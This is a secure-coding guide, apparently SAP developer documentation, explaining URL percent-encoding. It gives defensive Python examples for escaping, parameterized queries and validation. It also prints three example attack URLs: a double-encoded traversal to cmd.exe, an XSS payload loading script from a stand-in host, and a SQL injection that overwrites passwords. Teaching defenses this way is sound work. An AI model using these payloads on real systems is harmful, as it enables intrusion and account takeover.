In technical literature, the terms URL encoding, UTF encoding, escape-encoding, percent-encoding, and Web encoding are often used interchangeably. To better understand malicious attacks such as XSS or SQL injection, you need some insight into URL encoding techniques.
Web applications transfer data between the client and the server using the HTTP or HTTPS protocols. User input can be passed to the server in the HTTP headers (for example, in the cookie field), in the POST data of the request body, or in the query portion of the requested URL. Data that is transferred in a URL has to be specially encoded to obey the syntax rules of URLs.
The standard (RFC 2396) distinguishes between two classes of characters, reserved and unreserved:
Characters from the reserved class have a special meaning in URL syntax, so using them as plain data could conflict with the correct interpretation of a URL. Escape-encoding allows these characters to be carried as data without being misinterpreted. Each encoded character is written as a triplet consisting of a percent character (%) followed by the two hexadecimal digits that represent the octet code of the original character.
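The triplet form described above can be illustrated with a minimal sketch using Python's standard urllib.parse module. The helper name percent_encode and the sample string are assumptions made for illustration only.

```python
from urllib.parse import quote, unquote

def percent_encode(text: str) -> str:
    """Escape every character outside the unreserved set as a %XX triplet."""
    # safe="" means reserved characters such as "/" are escaped as well.
    return quote(text, safe="")

encoded = percent_encode("a/b?c=d&e")
print(encoded)           # a%2Fb%3Fc%3Dd%26e
print(unquote(encoded))  # a/b?c=d&e
```

Each reserved character is replaced by "%" plus its two-digit hexadecimal octet value, for example "/" becomes "%2F".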
The percent character acts as the escape indicator within a URL and therefore has to be escaped itself as "%25" in order to be used as data in a URL. For URI encoding, we recommend that you never escape or un-escape the same string more than once. Un-escaping an already un-escaped string can cause a percent character that is plain data to be misinterpreted as the start of an escape sequence, and escaping an already escaped string causes the converse problem.
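The following minimal sketch, again using Python's urllib.parse, shows what goes wrong when a string is escaped or un-escaped more than once. The sample value "100%41" is an assumption chosen so that the literal text "%41" happens to look like an escape sequence.

```python
from urllib.parse import quote, unquote

data = "100%41"                # literal data: "%41" is text, not an escape

once = quote(data, safe="")    # escaped once
twice = quote(once, safe="")   # escaped twice by mistake

print(once)                    # 100%2541
print(twice)                   # 100%252541
print(unquote(once))           # 100%41    correct round trip
print(unquote(unquote(once)))  # 100A      un-escaped twice: data corrupted
print(unquote(twice))          # 100%2541  escaped twice: still encoded
```

Only the pairing of exactly one escape with exactly one un-escape returns the original data.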
If several layers of an application each decode the input, a multiply escape-encoded value can circumvent security checks that are performed only after the initial decoding pass. An example of multiple escape-encoding of this type is shown below using the character sequence "\" or "..\".
The backslash "\" can be described as "%5c" or the following permutations:
These different escape-encoding sequences give an example of possible entry points for URL attacks, such as:
URL Attack as a Multiple Decoding Attack
Example URL Attack
http://TARGET/scripts/..%255c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
Attack Result
The directory list of C:\ is revealed.
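The decoding passes behind this attack can be traced with a short sketch. It uses Python's urllib.parse.unquote as a stand-in for the server's decoder, which is an assumption, and the helper is_multiply_encoded is a hypothetical name introduced here.

```python
from urllib.parse import unquote

def is_multiply_encoded(value: str) -> bool:
    """Return True if decoding once still leaves something to decode."""
    once = unquote(value)
    return unquote(once) != once

path = "/scripts/..%255c..%%35cwinnt/system32/cmd.exe"

first_pass = unquote(path)
second_pass = unquote(first_pass)

print(first_pass)    # /scripts/..%5c..%5cwinnt/system32/cmd.exe
print(second_pass)   # /scripts/..\..\winnt/system32/cmd.exe
print(is_multiply_encoded(path))              # True
print(is_multiply_encoded("/scripts/a%20b"))  # False
```

A check for "..\" that runs after the first pass finds nothing, because the backslashes only appear after the second pass. Rejecting multiply encoded input outright is one possible design choice; it also rejects legitimate data that contains a literal percent sequence, so it suits strictly validated fields best.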
URL Attack as an XSS Attack
Example URL Attack
http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e
Attack Result
<script src="http://www.badplace.com/nasty.js"></script>
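As a minimal sketch of how this attack arises and how output encoding neutralizes it, the following Python snippet decodes the query parameter and then HTML-escapes it before it would be written into a page. The use of urllib.parse and html.escape is an assumption for illustration; the actual target application is a PHP script.

```python
import html
from urllib.parse import urlsplit, parse_qs

url = ("http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f"
       "www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e")

# The server decodes the query string once when it parses the request.
value = parse_qs(urlsplit(url).query)["data"][0]
print(value)  # <script src="http://www.badplace.com/nasty.js"></script>

# Output encoding turns markup characters into harmless HTML entities.
safe = html.escape(value)
print(safe)
```

If the decoded value is echoed into the response unchanged, the browser executes the script; after escaping, the same text is displayed as plain characters.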
URL Attack as an SQL Injection Attack
Example URL Attack
http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00
Attack Result
Executed database query:
SELECT preferences FROM logintable WHERE userid='bob'; update logintable set passwd='0wn3d';--
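The injection works only because the decoded parameter is concatenated into the SQL text. A minimal sketch of the usual countermeasure, a parameterized query, is shown below with Python's sqlite3 module and an in-memory database. The table layout and the sample row are assumptions made for illustration.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

url = ("http://target/login.asp?userid=bob%27%3b%20update%20logintable"
       "%20set%20passwd%3d%270wn3d%27%3b--%00")
userid = parse_qs(urlsplit(url).query)["userid"][0]

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE logintable (userid TEXT, passwd TEXT, preferences TEXT)")
conn.execute("INSERT INTO logintable VALUES ('bob', 'secret', 'dark-mode')")

# The "?" placeholder binds the value as data; it is never parsed as SQL.
rows = conn.execute(
    "SELECT preferences FROM logintable WHERE userid = ?", (userid,)
).fetchall()
passwd = conn.execute(
    "SELECT passwd FROM logintable WHERE userid = 'bob'"
).fetchone()[0]

print(rows)    # []
print(passwd)  # secret
```

The malicious string is compared as a whole against the userid column, matches no row, and the embedded update statement is never executed.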
Useful Hint:
There is a reference table of ASCII characters in URL encoding form (hexadecimal format) at www.w3schools.com/tags/ref_urlencode.asp.
For Web Dynpro for Java:
The architecture of Web Dynpro integrates output encoding functionality automatically. Therefore, you do not need to manually implement additional output encoding functionality.
The variety of character encoding schemes and the ways they can be combined allow a practically unlimited number of malicious encodings. The developer is therefore responsible for securing his or her application against encoding attacks of this type, in accordance with the following rules:
Always restrict the type of acceptable data as much as possible using strict validation rules.
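A strict validation rule of this kind can be sketched as an allow-list check that is applied after decoding the input exactly once. The pattern below (letters, digits, and underscore, at most 32 characters) and the function name validate_userid are assumptions for illustration; a real application would choose the rule that fits each field.

```python
import re
from urllib.parse import unquote

# Assumed policy for a user ID: 1 to 32 letters, digits, or underscores.
USERID_PATTERN = re.compile(r"[A-Za-z0-9_]{1,32}")

def validate_userid(raw: str) -> str:
    """Decode once, then accept only values that match the allow-list."""
    value = unquote(raw)  # exactly one decoding pass
    if USERID_PATTERN.fullmatch(value) is None:
        raise ValueError("invalid userid")
    return value

print(validate_userid("bob"))  # bob

for attempt in ("bob%27%3b--", "bob%2527"):
    try:
        validate_userid(attempt)
    except ValueError as err:
        print(attempt, "rejected:", err)
```

Because "%" is not in the allowed set, a doubly encoded value such as "bob%2527" is rejected after the single decoding pass instead of being decoded again by a later layer.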